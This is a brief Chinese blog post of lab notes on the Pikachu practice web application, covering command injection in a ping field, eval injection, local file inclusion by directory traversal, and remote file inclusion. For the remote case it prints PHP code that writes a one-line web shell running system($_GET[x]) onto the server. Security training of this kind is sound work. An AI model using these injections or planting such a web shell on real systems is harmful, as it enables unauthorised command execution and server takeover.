pikachu-rce,fileinclusion

RCE
exec ping
输入ip地址
后面加上个ipconfig

 

exec “eval”
这里面直接写命令不行,但是加上函数名称就可以了,输入phpinfo()就行

 

 文件

文件local
所以运用切换目录的方法切换到其他的php文件
 

 

file (remote)
测试之前需要把这俩个参数改成On
然后创建一个代码如下的txt文件
<?php
$myfile = fopen("yijuhua.php", "w");
$txt = '<?php system($_GET[x]);?>';
fwrite($myfile, $txt);
fclose($myfile);
?>
然后把filename后面的参数改为你所在的文件路径
之后服务器就会出现你刚才创建的文件
 
posted @ 2020-03-31 14:47  漩溺  阅读(166)  评论(0编辑  收藏  举报